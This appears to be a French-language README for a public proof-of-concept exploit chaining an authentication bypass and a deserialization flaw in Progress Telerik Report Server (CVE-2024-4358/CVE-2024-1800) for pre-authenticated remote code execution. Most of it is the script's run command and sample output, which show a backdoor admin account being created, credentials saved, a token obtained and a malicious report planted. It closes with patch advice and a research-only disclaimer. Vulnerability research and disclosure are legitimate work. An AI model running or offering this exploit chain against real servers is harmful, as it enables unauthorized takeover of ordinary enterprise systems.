
Chaîne RCE pré-authentifiée sur Progress Telerik Report Server (CVE-2024-4358/CVE-2024-1800)
Chaîne d'exploitation de désérialisation et de contournement d'authentification pour Telerik Report Server — CVE-2024-4358/CVE-2024-1800
Une analyse de la cause racine de la vulnérabilité est disponible sur mon blog poc
En pratique, toutes les versions existantes au moment de la publication de l'exploit ; pour référence future, toutes les versions majeures/mineures de la liste ci-dessous :
2012
2017
2018
2019
2020
2021
2022
2023
2024
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"
(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished
Mettez à jour vers la dernière version ou atténuez le risque en suivant les instructions de l'avis de sécurité Progress
Ce logiciel a été créé uniquement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive de ce logiciel. À utiliser de manière responsable.